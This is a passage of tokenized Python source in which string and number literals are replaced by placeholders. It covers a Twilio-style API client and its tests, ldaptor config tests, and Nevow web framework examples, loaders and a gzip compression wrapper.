<EOL> resp = Mock ( ) <EOL> resp . 
status_code = <NUM_LIT> <EOL> request . return_value = resp <EOL> phone_numbers = PhoneNumbers ( BASE_URI , AUTH ) <EOL> result = phone_numbers . delete ( '<STR_LIT>' ) <EOL> assert_true ( result ) <EOL> request . assert_called_with ( <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" . format ( <EOL> BASE_URI ) , <EOL> auth = AUTH , <EOL> use_json_extension = False <EOL> ) </s>
<s> from . . import NextGenInstanceResource , NextGenListResource <EOL> class IpAccessControlList ( NextGenInstanceResource ) : <EOL> """<STR_LIT>""" <EOL> def delete ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . parent . delete_instance ( self . name ) <EOL> class IpAccessControlLists ( NextGenListResource ) : <EOL> """<STR_LIT>""" <EOL> name = "<STR_LIT>" <EOL> instance = IpAccessControlList <EOL> key = "<STR_LIT>" <EOL> def list ( self , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( IpAccessControlLists , self ) . list ( ** kwargs ) <EOL> def create ( self , ip_access_control_list_sid ) : <EOL> """<STR_LIT>""" <EOL> data = { <EOL> '<STR_LIT>' : ip_access_control_list_sid <EOL> } <EOL> return self . create_instance ( data ) <EOL> def delete ( self , ip_access_control_list_sid ) : <EOL> """<STR_LIT>""" <EOL> return self . delete_instance ( ip_access_control_list_sid ) </s>
<s> """<STR_LIT>""" <EOL> from imaginary . creation import CreationPluginHelper , createCreator <EOL> thingPlugin = CreationPluginHelper ( "<STR_LIT>" , createCreator ( ) ) </s>
<s> def getInt ( i ) : <EOL> d = '<STR_LIT>' <EOL> for c in i : <EOL> if not c . isdigit ( ) : <EOL> return d , c <EOL> d = d + c <EOL> ss = '<STR_LIT>' <EOL> BEGIN , END , ADD , NUMBER , CHAR , ATTS , STR = range ( <NUM_LIT:7> ) <EOL> def tokenize ( s ) : <EOL> s = iter ( s ) <EOL> for c in s : <EOL> if c != '<STR_LIT>' : <EOL> yield CHAR , c <EOL> continue <EOL> c = s . next ( ) <EOL> if c != '<STR_LIT:[>' : <EOL> yield CHAR , '<STR_LIT>' <EOL> yield CHAR , c <EOL> continue <EOL> yield BEGIN , c <EOL> while <NUM_LIT:1> : <EOL> d , c = getInt ( s ) <EOL> yield NUMBER , d <EOL> if c == '<STR_LIT:m>' : <EOL> yield END , c <EOL> break <EOL> def parser ( tokens ) : <EOL> tokens = iter ( tokens ) <EOL> sofar = '<STR_LIT>' <EOL> for tp , token in tokens : <EOL> if tp == CHAR : <EOL> sofar += token <EOL> if tp == BEGIN : <EOL> if sofar : <EOL> yield STR , sofar <EOL> sofar = '<STR_LIT>' <EOL> atts = [ ] <EOL> for tp , token in tokens : <EOL> if tp == END : <EOL> break <EOL> atts . append ( int ( token ) ) <EOL> yield ATTS , atts <EOL> if sofar : <EOL> yield STR , sofar <EOL> sofar = '<STR_LIT>' <EOL> def prettylist ( l ) : <EOL> res = [ ] <EOL> for tp , data in l : <EOL> if tp == ATTS : <EOL> res . append ( '<STR_LIT>' + '<STR_LIT:U+002CU+0020>' . join ( map ( str , data ) ) + '<STR_LIT>' ) <EOL> else : <EOL> res . append ( repr ( data ) + '<STR_LIT:\n>' ) <EOL> return '<STR_LIT>' . join ( res ) <EOL> def prettystring ( s ) : <EOL> return prettylist ( ( parser ( tokenize ( s ) ) ) ) <EOL> def _test ( ) : <EOL> print prettystring ( ss ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> _test ( ) </s>
<s> """<STR_LIT>""" </s>
<s> """<STR_LIT>""" <EOL> from twisted . trial import unittest <EOL> import os <EOL> from ldaptor import config <EOL> def writeFile ( path , content ) : <EOL> f = file ( path , '<STR_LIT:w>' ) <EOL> f . write ( content ) <EOL> f . close ( ) <EOL> class TestConfig ( unittest . TestCase ) : <EOL> def testSomething ( self ) : <EOL> self . dir = self . mktemp ( ) <EOL> os . mkdir ( self . dir ) <EOL> self . f1 = os . path . join ( self . dir , '<STR_LIT>' ) <EOL> writeFile ( self . f1 , """<STR_LIT>""" ) <EOL> self . f2 = os . path . join ( self . dir , '<STR_LIT>' ) <EOL> writeFile ( self . f2 , """<STR_LIT>""" ) <EOL> self . cfg = config . loadConfig ( <EOL> configFiles = [ self . f1 , self . f2 ] , <EOL> reload = True ) <EOL> val = self . cfg . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( val , '<STR_LIT>' ) <EOL> val = self . cfg . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> self . assertEquals ( val , '<STR_LIT>' ) <EOL> class IdentitySearch ( unittest . TestCase ) : <EOL> def setUp ( self ) : <EOL> self . dir = self . mktemp ( ) <EOL> os . mkdir ( self . dir ) <EOL> self . f1 = os . path . join ( self . dir , '<STR_LIT>' ) <EOL> writeFile ( self . f1 , """<STR_LIT>""" ) <EOL> self . cfg = config . loadConfig ( <EOL> configFiles = [ self . f1 ] , <EOL> reload = True ) <EOL> self . config = config . LDAPConfig ( ) <EOL> def testConfig ( self ) : <EOL> self . assertEquals ( self . config . getIdentitySearch ( '<STR_LIT:foo>' ) , <EOL> '<STR_LIT>' ) <EOL> def testCopy ( self ) : <EOL> conf = self . config . copy ( identitySearch = '<STR_LIT>' ) <EOL> self . assertEquals ( conf . getIdentitySearch ( '<STR_LIT:foo>' ) , <EOL> '<STR_LIT>' ) <EOL> def testInitArg ( self ) : <EOL> conf = config . LDAPConfig ( identitySearch = '<STR_LIT>' ) <EOL> self . assertEquals ( conf . getIdentitySearch ( '<STR_LIT:foo>' ) , <EOL> '<STR_LIT>' ) </s>
<s> from twisted . internet import reactor <EOL> from twisted . internet . defer import succeed <EOL> from nevow . appserver import NevowSite <EOL> from nevow . rend import Page , Fragment <EOL> from nevow . page import Element , renderer <EOL> from nevow . loaders import stan <EOL> from nevow . tags import directive , div , span <EOL> class Static : <EOL> docFactory = stan ( "<STR_LIT>" * <NUM_LIT:100> ) <EOL> class StaticFragment ( Static , Fragment ) : <EOL> pass <EOL> class StaticElement ( Static , Element ) : <EOL> pass <EOL> class Tiny : <EOL> docFactory = stan ( div ( render = directive ( "<STR_LIT:foo>" ) ) ) <EOL> class TinyFragment ( Tiny , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> return ctx . tag [ span [ "<STR_LIT:result>" ] ] <EOL> class TinyElement ( Tiny , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> return tag [ span [ "<STR_LIT:result>" ] ] <EOL> renderer ( foo ) <EOL> class Huge : <EOL> docFactory = stan ( div [ [ <EOL> div ( render = directive ( "<STR_LIT:foo>" ) ) <EOL> for x in range ( <NUM_LIT:100> ) ] ] ) <EOL> class HugeFragment ( Huge , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> return ctx . tag [ span [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:!>" ] ] <EOL> class HugeElement ( Huge , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> return tag [ span [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT:!>" ] ] <EOL> renderer ( foo ) <EOL> class Nested : <EOL> docFactory = stan ( div ( render = directive ( "<STR_LIT:foo>" ) ) ) <EOL> def __init__ ( self , count = <NUM_LIT:6> ) : <EOL> self . count = count <EOL> class NestedFragment ( Nested , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> if self . count : <EOL> return span [ NestedFragment ( self . count - <NUM_LIT:1> ) ] <EOL> return ctx . tag [ "<STR_LIT>" ] <EOL> class NestedElement ( Nested , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> if self . count : <EOL> return span [ NestedFragment ( self . 
count - <NUM_LIT:1> ) ] <EOL> return tag [ "<STR_LIT>" ] <EOL> renderer ( foo ) <EOL> class Deferred : <EOL> docFactory = stan ( div ( render = directive ( '<STR_LIT:foo>' ) ) ) <EOL> class DeferredFragment ( Deferred , Fragment ) : <EOL> def render_foo ( self , ctx , data ) : <EOL> return ctx . tag [ succeed ( "<STR_LIT:foo>" ) ] <EOL> class DeferredElement ( Deferred , Element ) : <EOL> def foo ( self , request , tag ) : <EOL> return tag [ succeed ( "<STR_LIT:foo>" ) ] <EOL> renderer ( foo ) <EOL> class Compare ( Page ) : <EOL> def __init__ ( self , fragment , element ) : <EOL> self . fragment = fragment <EOL> self . element = element <EOL> def child_fragment ( self , ctx ) : <EOL> return Page ( docFactory = stan ( self . fragment ) ) <EOL> def child_element ( self , ctx ) : <EOL> return Page ( docFactory = stan ( self . element ) ) <EOL> class Root ( Page ) : <EOL> def child_static ( self , ctx ) : <EOL> return Compare ( StaticFragment ( ) , StaticElement ( ) ) <EOL> def child_tiny ( self , ctx ) : <EOL> return Compare ( TinyFragment ( ) , TinyElement ( ) ) <EOL> def child_huge ( self , ctx ) : <EOL> return Compare ( HugeFragment ( ) , HugeElement ( ) ) <EOL> def child_nested ( self , ctx ) : <EOL> return Compare ( NestedFragment ( ) , NestedElement ( ) ) <EOL> def child_deferred ( self , ctx ) : <EOL> return Compare ( DeferredFragment ( ) , DeferredElement ( ) ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> reactor . listenTCP ( <NUM_LIT> , NevowSite ( Root ( ) ) ) <EOL> reactor . run ( ) </s>
<s> from twisted . python import util <EOL> from nevow import inevow , rend , tags as t , loaders <EOL> class Root ( rend . Page ) : <EOL> addSlash = True <EOL> docFactory = loaders . xmlfile ( util . sibpath ( __file__ , '<STR_LIT>' ) ) <EOL> def data_ip ( self , ctx , data ) : <EOL> return inevow . IRequest ( ctx ) . client . host <EOL> def render_header ( self , ctx , data ) : <EOL> return ctx . tag [ Header ( data ) ] <EOL> def render_sidebar ( self , ctx , data ) : <EOL> ctx . tag . fillSlots ( '<STR_LIT>' , SideBar ( ) ) <EOL> return ctx . tag <EOL> def render_content ( self , ctx , data ) : <EOL> return ctx . tag [ Content ( ) ] <EOL> class Header ( rend . Fragment ) : <EOL> docFactory = loaders . stan ( <EOL> t . invisible [ <EOL> t . p ( render = t . directive ( "<STR_LIT>" ) ) [ "<STR_LIT>" ] <EOL> ] <EOL> ) <EOL> def render_ip ( self , ctx , data ) : <EOL> return ctx . tag [ data ] <EOL> class SideBar ( rend . Fragment ) : <EOL> docFactory = loaders . stan ( <EOL> t . ul [ <EOL> t . li [ "<STR_LIT>" ] , <EOL> t . li [ "<STR_LIT>" ] , <EOL> t . li [ "<STR_LIT>" ] , <EOL> ] <EOL> ) <EOL> class Content ( rend . Fragment ) : <EOL> docFactory = loaders . stan ( <EOL> t . p [ """<STR_LIT>""" ] <EOL> ) </s>
<s> from nevow import rend , loaders , tags as t <EOL> from nevow . taglibrary import tabbedPane <EOL> class TabbedPage ( rend . Page ) : <EOL> addSlash = True <EOL> docFactory = loaders . stan ( <EOL> t . html [ <EOL> t . head [ <EOL> t . title [ "<STR_LIT>" ] , <EOL> tabbedPane . tabbedPaneGlue . inlineGlue <EOL> ] , <EOL> t . body [ <EOL> t . invisible ( data = t . directive ( "<STR_LIT>" ) , <EOL> render = tabbedPane . tabbedPane ) <EOL> ] <EOL> ] <EOL> ) <EOL> def data_pages ( self , ctx , data ) : <EOL> return { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : <NUM_LIT:1> , <EOL> "<STR_LIT>" : ( ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , t . p [ t . invisible ( <EOL> render = tabbedPane . tabbedPane , <EOL> data = { "<STR_LIT:name>" : "<STR_LIT>" , <EOL> "<STR_LIT>" : ( ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) , <EOL> ( "<STR_LIT>" , t . p [ "<STR_LIT>" ] ) ) } ) ] <EOL> ) ) } </s>
<s> """<STR_LIT>""" <EOL> from gzip import GzipFile <EOL> from zope . interface import implements <EOL> from twisted . internet . defer import maybeDeferred , Deferred <EOL> from twisted . internet . interfaces import IConsumer <EOL> from nevow . inevow import IRequest , IResource <EOL> from nevow . appserver import errorMarker <EOL> from nevow . rend import NotFound <EOL> def parseAcceptEncoding ( value ) : <EOL> """<STR_LIT>""" <EOL> encodings = { } <EOL> if value . strip ( ) : <EOL> for pair in value . split ( '<STR_LIT:U+002C>' ) : <EOL> pair = pair . strip ( ) <EOL> if '<STR_LIT:;>' in pair : <EOL> params = pair . split ( '<STR_LIT:;>' ) <EOL> encoding = params [ <NUM_LIT:0> ] <EOL> params = dict ( param . split ( '<STR_LIT:=>' ) for param in params [ <NUM_LIT:1> : ] ) <EOL> priority = float ( params . get ( '<STR_LIT:q>' , <NUM_LIT:1.0> ) ) <EOL> else : <EOL> encoding = pair <EOL> priority = <NUM_LIT:1.0> <EOL> encodings [ encoding ] = priority <EOL> if '<STR_LIT>' not in encodings and '<STR_LIT:*>' not in encodings : <EOL> encodings [ '<STR_LIT>' ] = <NUM_LIT> <EOL> return encodings <EOL> class _ProxyDescriptor ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , name ) : <EOL> self . name = name <EOL> def __get__ ( self , oself , type = None ) : <EOL> """<STR_LIT>""" <EOL> if oself is None : <EOL> return self <EOL> return getattr ( oself . underlying , self . name ) <EOL> def __set__ ( self , oself , value ) : <EOL> """<STR_LIT>""" <EOL> setattr ( oself . underlying , self . name , value ) <EOL> def __delete__ ( self , oself ) : <EOL> """<STR_LIT>""" <EOL> delattr ( oself . underlying , self . name ) <EOL> def _makeBase ( ) : <EOL> """<STR_LIT>""" <EOL> d = { } <EOL> for iface in [ IRequest , IConsumer ] : <EOL> for attrName in iface . 
names ( all = True ) : <EOL> d [ attrName ] = _ProxyDescriptor ( attrName ) <EOL> return type ( '<STR_LIT>' , ( object , ) , d ) <EOL> class CompressingRequestWrapper ( _makeBase ( ) ) : <EOL> """<STR_LIT>""" <EOL> implements ( IRequest ) <EOL> encoding = '<STR_LIT>' <EOL> compressLevel = <NUM_LIT:6> <EOL> def __init__ ( self , underlying ) : <EOL> self . underlying = underlying <EOL> self . setHeader ( '<STR_LIT>' , self . encoding ) <EOL> self . _gzipFile = None <EOL> self . underlying . responseHeaders . removeHeader ( '<STR_LIT>' ) <EOL> def setHeader ( self , name , value ) : <EOL> """<STR_LIT>""" <EOL> if name . lower ( ) == '<STR_LIT>' : <EOL> return <EOL> else : <EOL> return self . underlying . setHeader ( name , value ) <EOL> def write ( self , data ) : <EOL> """<STR_LIT>""" <EOL> if self . _gzipFile is None : <EOL> self . _gzipFile = GzipFile ( fileobj = self . underlying , mode = '<STR_LIT:wb>' , compresslevel = self . compressLevel ) <EOL> self . _gzipFile . write ( data ) <EOL> def finishRequest ( self , success ) : <EOL> """<STR_LIT>""" <EOL> if self . _gzipFile is None : <EOL> self . write ( '<STR_LIT>' ) <EOL> self . _gzipFile . close ( ) <EOL> self . underlying . finishRequest ( success ) <EOL> class CompressingResourceWrapper ( object ) : <EOL> """<STR_LIT>""" <EOL> implements ( IResource ) <EOL> def __init__ ( self , underlying ) : <EOL> self . underlying = underlying <EOL> def canCompress ( self , req ) : <EOL> """<STR_LIT>""" <EOL> value = req . getHeader ( '<STR_LIT>' ) <EOL> if value is not None : <EOL> encodings = parseAcceptEncoding ( value ) <EOL> return encodings . get ( '<STR_LIT>' , <NUM_LIT:0.0> ) > <NUM_LIT:0.0> <EOL> return False <EOL> def renderHTTP ( self , ctx ) : <EOL> """<STR_LIT>""" <EOL> req = IRequest ( ctx ) <EOL> if not self . canCompress ( req ) : <EOL> return self . underlying . renderHTTP ( ctx ) <EOL> req = CompressingRequestWrapper ( req ) <EOL> ctx . 
remember ( req , IRequest ) <EOL> def _cbDoneRendering ( html ) : <EOL> if isinstance ( html , str ) : <EOL> req . write ( html ) <EOL> req . finishRequest ( True ) <EOL> return errorMarker <EOL> return html <EOL> return maybeDeferred ( self . underlying . renderHTTP , ctx ) . addCallback ( _cbDoneRendering ) <EOL> def locateChild ( self , ctx , segments ) : <EOL> """<STR_LIT>""" <EOL> def _cbWrapChild ( result ) : <EOL> if result in [ NotFound , errorMarker ] : <EOL> return result <EOL> if isinstance ( result , tuple ) : <EOL> res , segments = result <EOL> if isinstance ( res , Deferred ) : <EOL> return res . addCallback ( lambda res : _cbWrapChild ( ( res , segments ) ) ) <EOL> return type ( self ) ( IResource ( res ) ) , segments <EOL> raise ValueError ( '<STR_LIT>' % ( result , ) ) <EOL> return maybeDeferred ( self . underlying . locateChild , ctx , segments ) . addCallback ( _cbWrapChild ) </s>
<s> from xml . dom import pulldom <EOL> from cStringIO import StringIO <EOL> from twisted . python import usage <EOL> import nevow <EOL> class LineBasedStream ( object ) : <EOL> """<STR_LIT>""" <EOL> def __init__ ( self , stream ) : <EOL> self . stream = stream <EOL> self . buffer = '<STR_LIT>' <EOL> def read ( self , bufsize ) : <EOL> if not self . buffer : <EOL> self . buffer = self . stream . readline ( bufsize ) <EOL> if not self . buffer : <EOL> return '<STR_LIT>' <EOL> data , self . buffer = self . buffer , '<STR_LIT>' <EOL> while data . endswith ( '<STR_LIT:\n>' ) : <EOL> self . buffer = self . buffer + data [ - <NUM_LIT:1> ] <EOL> data = data [ : - <NUM_LIT:1> ] <EOL> if not data : <EOL> data , self . buffer = self . buffer , '<STR_LIT>' <EOL> return data <EOL> def getMsgID ( node ) : <EOL> out = StringIO ( ) <EOL> print >> out , '<STR_LIT>' <EOL> for child in node . childNodes : <EOL> s = child . toxml ( '<STR_LIT:utf-8>' ) <EOL> s = s . replace ( '<STR_LIT:\\>' , '<STR_LIT>' ) <EOL> s = s . replace ( '<STR_LIT:">' , '<STR_LIT>' ) <EOL> s = s . replace ( '<STR_LIT:\n>' , '<STR_LIT>' ) <EOL> print >> out , '<STR_LIT>' % s <EOL> print >> out , '<STR_LIT>' <EOL> return out . getvalue ( ) <EOL> def process ( filename , messages ) : <EOL> f = open ( filename , '<STR_LIT>' ) <EOL> stream = LineBasedStream ( f ) <EOL> events = pulldom . parse ( stream ) <EOL> for ( event , node ) in events : <EOL> if event == pulldom . START_ELEMENT : <EOL> get = getattr ( node , '<STR_LIT>' , None ) <EOL> if get is not None : <EOL> value = get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> if value == '<STR_LIT>' : <EOL> events . expandNode ( node ) <EOL> msgid = getMsgID ( node ) <EOL> l = messages . setdefault ( msgid , [ ] ) <EOL> l . append ( '<STR_LIT>' % ( filename , events . parser . getLineNumber ( ) ) ) <EOL> def report ( messages ) : <EOL> for msgid , locations in messages . 
items ( ) : <EOL> for line in locations : <EOL> print line <EOL> print msgid <EOL> class GettextOptions ( usage . Options ) : <EOL> def opt_version ( self ) : <EOL> print '<STR_LIT>' , nevow . __version__ <EOL> usage . Options . opt_version ( self ) <EOL> def parseArgs ( self , * files ) : <EOL> self [ '<STR_LIT>' ] = files <EOL> def runApp ( config ) : <EOL> messages = { } <EOL> for filename in config [ '<STR_LIT>' ] : <EOL> process ( filename , messages ) <EOL> report ( messages ) <EOL> def run ( ) : <EOL> from twisted . application import app <EOL> app . run ( runApp , GettextOptions ) </s>
<s> import os <EOL> from twisted . trial import unittest , util <EOL> from nevow import context <EOL> from nevow import flat <EOL> from nevow . flat . flatstan import _PrecompiledSlot <EOL> from nevow import loaders <EOL> from nevow import tags as t <EOL> class TestDocFactories ( unittest . TestCase ) : <EOL> def _preprocessorTest ( self , docFactory ) : <EOL> def preprocessor ( uncompiled ) : <EOL> self . assertEquals ( len ( uncompiled ) , <NUM_LIT:1> ) <EOL> uncompiled = uncompiled [ <NUM_LIT:0> ] <EOL> self . assertEquals ( uncompiled . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( len ( uncompiled . children ) , <NUM_LIT:2> ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:0> ] . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:0> ] . children , [ '<STR_LIT>' ] ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:1> ] . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( uncompiled . children [ <NUM_LIT:1> ] . children , [ '<STR_LIT>' ] ) <EOL> return t . div [ '<STR_LIT>' ] <EOL> doc = docFactory . load ( preprocessors = [ preprocessor ] ) <EOL> self . assertEquals ( doc , [ '<STR_LIT>' ] ) <EOL> def test_stanPreprocessors ( self ) : <EOL> """<STR_LIT>""" <EOL> factory = loaders . stan ( <EOL> t . div [ t . span [ '<STR_LIT>' ] , t . span [ '<STR_LIT>' ] ] ) <EOL> return self . _preprocessorTest ( factory ) <EOL> def test_stan ( self ) : <EOL> doc = t . ul ( id = '<STR_LIT>' ) [ t . li [ '<STR_LIT>' ] , t . li [ '<STR_LIT>' ] , t . li [ '<STR_LIT>' ] ] <EOL> df = loaders . stan ( doc ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_stanPrecompiled ( self ) : <EOL> """<STR_LIT>""" <EOL> doc = flat . precompile ( t . ul ( id = '<STR_LIT>' ) [ t . li [ '<STR_LIT>' ] , t . li [ '<STR_LIT>' ] , t . slot ( '<STR_LIT>' ) ] ) <EOL> df = loaders . stan ( doc ) <EOL> loaded = df . load ( ) <EOL> self . 
assertEqual ( loaded [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> self . failUnless ( isinstance ( loaded [ <NUM_LIT:1> ] , _PrecompiledSlot ) ) <EOL> self . assertEqual ( loaded [ <NUM_LIT:1> ] . name , '<STR_LIT>' ) <EOL> self . assertEqual ( loaded [ <NUM_LIT:2> ] , '<STR_LIT>' ) <EOL> def test_htmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> df = loaders . htmlstr ( doc ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> test_htmlstr . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile ( self ) : <EOL> doc = '<STR_LIT>' <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( doc ) <EOL> f . close ( ) <EOL> df = loaders . htmlfile ( temp ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> test_htmlfile . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile_slots ( self ) : <EOL> doc = '<STR_LIT>' <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( doc ) <EOL> f . close ( ) <EOL> df = loaders . htmlfile ( temp ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] . children , [ '<STR_LIT>' ] ) <EOL> test_htmlfile_slots . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_xmlstr ( self ) : <EOL> doc = '<STR_LIT>' <EOL> df = loaders . xmlstr ( doc ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> def test_xmlstrPreprocessors ( self ) : <EOL> """<STR_LIT>""" <EOL> factory = loaders . xmlstr ( <EOL> '<STR_LIT>' ) <EOL> return self . _preprocessorTest ( factory ) <EOL> def test_xmlfile ( self ) : <EOL> doc = '<STR_LIT>' <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( doc ) <EOL> f . close ( ) <EOL> df = loaders . xmlfile ( temp ) <EOL> self . assertEquals ( df . 
load ( ) [ <NUM_LIT:0> ] , doc ) <EOL> def test_xmlfilePreprocessors ( self ) : <EOL> """<STR_LIT>""" <EOL> xmlFile = self . mktemp ( ) <EOL> f = file ( xmlFile , '<STR_LIT:w>' ) <EOL> f . write ( '<STR_LIT>' ) <EOL> f . close ( ) <EOL> factory = loaders . xmlfile ( xmlFile ) <EOL> return self . _preprocessorTest ( factory ) <EOL> def test_patterned ( self ) : <EOL> """<STR_LIT>""" <EOL> doc = t . div [ t . p [ t . span ( pattern = '<STR_LIT>' ) [ '<STR_LIT>' ] ] ] <EOL> df = loaders . stan ( doc , pattern = '<STR_LIT>' ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] . tagName , '<STR_LIT>' ) <EOL> self . assertEquals ( df . load ( ) [ <NUM_LIT:0> ] . children [ <NUM_LIT:0> ] , '<STR_LIT>' ) <EOL> def test_ignoreDocType ( self ) : <EOL> doc = '''<STR_LIT>''' <EOL> df = loaders . xmlstr ( doc , ignoreDocType = True ) <EOL> self . assertEquals ( flat . flatten ( df ) , '<STR_LIT>' ) <EOL> def test_ignoreComment ( self ) : <EOL> doc = '<STR_LIT>' <EOL> df = loaders . xmlstr ( doc , ignoreComment = True ) <EOL> self . assertEquals ( flat . flatten ( df ) , '<STR_LIT>' ) <EOL> class TestDocFactoriesCache ( unittest . TestCase ) : <EOL> doc = '''<STR_LIT>''' <EOL> nsdoc = '''<STR_LIT>''' <EOL> stan = t . div [ t . p ( pattern = '<STR_LIT:1>' ) [ '<STR_LIT>' ] , t . p ( pattern = '<STR_LIT:2>' ) [ '<STR_LIT>' ] ] <EOL> def test_stan ( self ) : <EOL> loader = loaders . stan ( self . stan ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . stan ( self . stan , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . stan ( self . 
stan , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> def test_htmlstr ( self ) : <EOL> loader = loaders . htmlstr ( self . doc ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlstr ( self . doc , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> test_htmlstr . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfile ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . doc ) <EOL> f . close ( ) <EOL> loader = loaders . htmlfile ( temp ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . htmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . htmlfile ( temp , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . htmlfile ( temp , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> test_htmlfile . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_htmlfileReload ( self ) : <EOL> temp = self . mktemp ( ) <EOL> f = file ( temp , '<STR_LIT:w>' ) <EOL> f . write ( self . doc ) <EOL> f . close ( ) <EOL> loader = loaders . htmlfile ( temp ) <EOL> r = loader . 
load ( ) <EOL> self . assertEquals ( id ( r ) , id ( loader . load ( ) ) ) <EOL> os . utime ( temp , ( os . path . getatime ( temp ) , os . path . getmtime ( temp ) + <NUM_LIT:5> ) ) <EOL> self . assertNotEqual ( id ( r ) , id ( loader . load ( ) ) ) <EOL> test_htmlfileReload . suppress = [ <EOL> util . suppress ( message = <EOL> r"<STR_LIT>" <EOL> "<STR_LIT>" ) ] <EOL> def test_xmlstr ( self ) : <EOL> loader = loaders . xmlstr ( self . nsdoc ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> loader = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> self . assertEquals ( id ( loader . load ( ) ) , id ( loader . load ( ) ) ) <EOL> l1 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> l1 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:1>' ) <EOL> l2 = loaders . xmlstr ( self . nsdoc , pattern = '<STR_LIT:2>' ) <EOL> self . assertNotEqual ( id ( l1 . load ( ) ) , id ( l2 . load ( ) ) ) <EOL> def test_xmlSlotDefault ( self ) : <EOL> """<STR_LIT>""" <EOL> slotsdoc = '''<STR_LIT>''' 